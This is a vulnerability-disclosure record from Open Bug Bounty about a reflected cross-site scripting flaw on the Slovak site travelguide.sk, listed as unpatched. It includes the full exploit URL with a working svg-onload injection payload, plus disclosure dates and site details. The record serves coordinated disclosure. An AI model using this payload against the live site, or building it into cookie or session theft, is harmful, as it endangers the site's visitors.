travelguide.sk XSS vulnerability

2016-05-23T19:27:00
ID OBB:155715
Type openbugbounty
Reporter amlnspqr
Modified 2016-06-06T20:11:00

Description

Vulnerable URL:
http://www.travelguide.sk/svk/turisticke-zaujimavosti/?lfKeyword=%3Csvg%20onload=alert%28/XSSPOSED/%29%3E&searchItems;=KChuYW1lIGxpa2UgY29udmVydChfdXRmOCAnJTxzdmclb25sb2FkPWFsZXJ0KC94c3Nwb3NlZC8pPiUnIHVzaW5nIHV0ZjgpIG9yIG5hbWUgbGlrZSBjb252ZXJ0KF91dGY4ICclPHN2ZyVvbmxvYWQ9YWxlcnQoL3hzc3Bvc2VkLyk+JScgdXNpbmcgdXRmOCkgY29sbGF0ZSB1dGY4X2dlbmVyYWxfY2kpKQ==
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 27.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 314069
VIP website status:| No
Check travelguide.sk SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 23 May, 2016 19:27 GMT
Generic security notifications sent to website owner| 23 May, 2016 19:28 GMT
Vulnerability details disclosed by researcher| 6 June, 2016 20:11 GMT